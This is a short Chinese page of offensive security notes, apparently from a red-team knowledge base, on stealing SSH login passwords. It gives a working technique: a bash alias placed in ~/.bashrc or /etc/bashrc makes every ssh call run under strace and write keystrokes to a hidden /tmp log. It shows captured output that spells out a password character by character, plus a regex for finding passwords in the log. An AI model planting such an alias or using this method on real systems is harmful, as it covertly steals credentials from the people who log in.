menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 002-收集任意指定程序登录凭证 chevron_right 001-收集ssh登录凭证.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    001-收集ssh登录凭证.md
    678 B / 2021-07-17 00:01:42
        ### 收集ssh登录凭证
    
    1.添加命令别名
    
    ```bash
    # 添加命令别名
    vi ~/.bashrc或者/etc/bashrc
    alias ssh='strace -f -e trace=read,write -o /tmp/.ssh-`date '+%d%h%m%s'`.log -s 32 ssh'
    # 使命令别名立即生效
    source ~/.bashrc
    
    ```
    
    2.记录的strace文件如下:
    
    ```bash
    936   write(4, "[email protected]'s password: ", 32) = 32
    936   read(4, "t", 1)                   = 1
    936   read(4, "o", 1)                   = 1
    936   read(4, "o", 1)                   = 1
    936   read(4, "r", 1)                   = 1
    936   read(4, "\n", 1)                  = 1
    936   write(4, "\n", 1)                 = 1
    
    ```
    
    3.可以通过正则`.+@.+\bpassword`定位密码位置
    
    
    
    links
    file_download